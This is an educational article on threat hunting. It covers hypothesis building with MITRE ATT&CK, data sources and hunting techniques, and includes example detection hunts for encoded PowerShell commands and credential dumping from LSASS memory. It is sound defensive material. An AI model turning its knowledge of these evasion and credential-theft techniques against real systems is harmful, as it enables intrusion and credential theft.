Automated detection systems, no matter how sophisticated, cannot catch everything. Threat hunting is the practice of proactively searching for threats that have evaded existing defenses. It assumes that adversaries may already be present in the environment and actively looks for evidence of their presence.
Why Hunt?
Detection rules are reactive. They catch threats that match known patterns. But sophisticated adversaries deliberately avoid triggering alerts. They use legitimate tools (living off the land), encrypt their communications, and blend their activity with normal operations.
The average dwell time, the period between initial compromise and detection, exceeds 200 days in many industries. Threat hunting aims to reduce that window by actively searching for signs of compromise rather than waiting for alerts.
Hypothesis-Driven Hunting
Effective threat hunting is not random searching. It begins with a hypothesis: a specific threat behavior you believe might be occurring in your environment.
Building Hypotheses starts with threat intelligence. What TTPs (tactics, techniques, and procedures) are adversaries using against organizations like yours? The MITRE ATT&CK framework provides a structured catalog of adversary behaviors to base hypotheses on.
For example: "Attackers may be using PowerShell to execute encoded commands for defense evasion (T1059.001)." This hypothesis is specific, testable, and based on known adversary behavior.
Testing Hypotheses involves querying available data sources for evidence. For the PowerShell hypothesis, you would search endpoint logs for powershell.exe executions with -EncodedCommand or -e parameters, decode those commands, and analyze whether they represent legitimate administration or suspicious activity.
Outcomes are either evidence of threat activity (escalate to incident response) or confirmation that the hypothesis does not match current activity (document findings and move to next hypothesis). Both outcomes provide value.
Essential Data Sources
Threat hunting requires visibility. The richer your data, the more effective your hunts.
Endpoint Telemetry from EDR solutions provides process creation events, command-line arguments, file modifications, registry changes, and network connections. This is the most valuable data source for most hunts.
Network Traffic reveals communication patterns: connections to external IPs, DNS queries, data transfer volumes, and protocol usage. NetFlow data provides summary statistics even when full packet capture is not feasible.
Authentication Logs from Active Directory and identity providers show who is accessing what. Anomalous logon patterns, ticket granting activity, and privilege escalation attempts are visible here.
Cloud Logs from AWS CloudTrail, Azure Activity Logs, and similar services track administrative actions in cloud environments.
Practical Hunting Techniques
Frequency Analysis identifies rare events that might indicate malicious activity. Most users run common applications. A single workstation running a rarely seen executable warrants investigation.
Stacking groups similar events to find outliers. If 99% of PowerShell executions use standard flags and one uses an unusual parameter combination, focus on the outlier.
Baselining establishes what normal looks like for your environment. Once you know normal, deviations become visible. What processes normally run on servers? What external connections do workstations typically make?
TTP-Based Hunting maps to specific MITRE ATT&CK techniques. Choose a technique, understand how adversaries implement it, and search for artifacts that would result from that implementation.
Example Hunt: Credential Dumping
Hypothesis: Attackers may have compromised credentials by accessing LSASS memory (T1003.001).
Data Required: Process creation logs showing access to lsass.exe, specifically processes that open LSASS with memory read access.
Investigation Steps: 1. Query for processes that accessed lsass.exe 2. Filter out known legitimate security tools (AV, EDR agents) 3. Investigate remaining processes: What is the parent process? What user context? What command line? 4. Cross-reference with threat intelligence on known credential dumping tools
Expected Findings: Legitimate access from security tools. Suspicious access from unexpected processes like renamed executables or scripts requires immediate escalation.
Building a Hunting Program
Start small. You do not need a dedicated hunting team to begin. Allocate a few hours per week for structured hunting exercises.
Document everything. Hunting produces knowledge even when it does not find threats. Document hypotheses, queries, findings, and false positive patterns. This knowledge compounds over time.
Automate successful hunts. When a hunt identifies a detection gap, work with detection engineering to create automated alerts. The goal is continuous improvement of detection coverage.
Share findings. Hunting insights benefit the broader security community. Contribute to threat intelligence sharing platforms and publish research on novel techniques.
The Hunting Mindset
Effective threat hunters think like adversaries. They understand how attacks unfold, what artifacts they leave behind, and how those artifacts can be distinguished from legitimate activity. This mindset develops through practice, studying real-world incidents, and continuous learning about evolving threats.
Threat hunting is not a tool or a process. It is a skill that improves with deliberate practice.